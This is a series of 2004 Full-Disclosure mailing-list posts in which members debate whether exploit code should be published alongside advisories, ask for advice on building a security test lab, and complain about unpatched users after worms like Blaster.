Hey, I have to agree with Borg. I am of course new to your list. I joined it to learn the what, when and where of security. I must say that when I saw exploits posted I was a bit taken back. My first thought was Guess I can expect to see it soon. A question naturally comes; would it show in the wild had it not been posted. And what percentages of exploits do go in the wild due to being posted along with the advisory? Then again how can I be concerned about an advisory if I can't see the effects of the exploit? Of course, then again, I really have understood little about the code of the exploit but did a lot on the advisory. Just a n00bie view. Borg wrote: Message: 28 Date: Tue, 27 Apr 2004 13:19:44 -0400 From: chris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] no more public exploits Heres my two cents :-/ Exploit code is better kept private. Advisories should be public. Why? Because exploit code is not easy to write depending on the bug. And I for one sure dont want some 'penetration tester' taking my code and plugging it into his automated scanner and collecting the cash. Im far to greedy to watch that happen. Sorry. NON-Disclosure of Exploit code. Full-Disclosure of Advisories. As far as the discussion of sysadmins patching on time or not. All I will say is this . . . if they did patch on time there wouldnt be a www.zone-h.org. - borg (ChrisR-) --__--__-- Borg ended. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1605 - 14 msgs
Asking for suggestions on best methods, equipment and experience to set up test lab. I am more then anxious to learn and build my experience thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure Super Worm
thank you Randall M Willam, My job is to support sales force using laptops. Also customer service reps. That silly scanning gets in the way and slows progress! Not only have they not learned, but don't care! I pull my hair out trying to come up with ways to support them and protect the network. Any advise welcomed Randall M. --__--__-- Message: 8 Date: Sun, 18 Apr 2004 09:33:38 -0400 From: William Warren [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Super Worm I bet most have not learned from blaster. Sure a nubmer of users may have gotten protected but i bet a majority are not. End of Full-Disclosure Digest ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html